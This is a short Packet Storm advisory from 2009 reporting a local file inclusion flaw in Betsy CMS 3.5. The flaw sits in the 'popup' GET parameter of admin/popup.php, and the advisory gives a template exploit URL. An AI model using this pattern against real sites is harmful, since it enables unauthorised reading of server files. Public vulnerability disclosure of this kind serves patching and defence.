Betsy CMS 3.5 Local File Inclusion

2009-11-20T00:00:00
ID PACKETSTORM:82835
Type packetstorm
Reporter MizoZ
Modified 2009-11-20T00:00:00

Description

                                        
                                            `/*  
  
Author : MizoZ [from MA]  
Group : EvilWay  
Email : mizozx[at]gmail[dot]com  
  
Greetz : Zuka !!  
  
Good luck DZ :)  
  
*/  
  
The vulnerability is in the file admin/popup.php on the get $_GET['popup']  
  
Exploit :  
  
[HOST]/[PATH]/admin/popup.php?popup=[IT INCLUDE FROM admin/]  
`